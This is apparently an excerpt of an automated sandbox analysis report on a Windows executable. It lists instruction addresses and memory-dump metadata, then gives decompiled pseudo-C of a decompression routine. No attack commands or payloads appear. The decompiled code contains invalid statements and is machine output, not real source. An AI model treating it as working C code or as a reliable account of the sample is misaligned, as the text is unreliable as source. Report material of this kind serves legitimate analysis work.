                                                  0x00000000
                                                  0x004064dd
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406810
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00406912
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00406912
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406637
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x0040693c
                                                  0x00406905

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                  • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                                  • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                                  • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
